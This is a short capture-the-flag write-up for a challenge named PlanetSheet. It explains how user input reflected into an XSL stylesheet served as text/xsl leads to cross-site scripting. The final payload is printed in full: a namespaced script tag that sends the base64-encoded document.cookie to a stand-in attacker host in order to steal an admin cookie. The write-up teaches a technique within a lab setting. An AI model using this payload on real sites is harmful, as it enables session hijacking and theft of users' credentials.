PlanetSheet

Search…
PlanetSheet
Let's start by warming a little bit! I love planets and I hate sheets so I made this website to show my favorite planets. Flag is in admin cookie.
Link: http://20.233.9.240:1337
In this challenge our input is reflected into an XSL document. For instance:
1
<?xml version="1.0" encoding="UTF-8"?>
2
<xsl:stylesheet version="1.0"
3
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
4
<xsl:template match="/">
5
  <html>
6
  <body>
7
    <h2>Planets</h2>
8
    <p>
9
OUR INPUT    <xsl:for-each select="catalog/cd">
10
      <xsl:value-of select="title"/>
11
      <xsl:if test="position() < last()-1">
12
        <xsl:text>, </xsl:text>
13
      </xsl:if>
14
      <xsl:if test="position()=last()-1">
15
        <xsl:text>, and </xsl:text>
16
      </xsl:if>
17
      <xsl:if test="position()=last()">
18
        <xsl:text>!</xsl:text>
19
      </xsl:if>
20
    </xsl:for-each>
21
    </p>
22
  </body>
23
  </html>
24
</xsl:template>
25
​
26
</xsl:stylesheet>
Copied!
When rendered in the browser, this yields an error.
Since the Content-Type is text/xsl, we can use <x:script> to perform XSS (source).
The final payload was
1
<x:script xmlns:x="http://www.w3.org/1999/xhtml" nonce="Y8Ret8N5CPXrSG">fetch(`http://ATTACKER.COM/${btoa(document.cookie)}`)</x:script>
Copied!
Document-Converter
NarutoKeeper
Last modified 13d ago
Copy link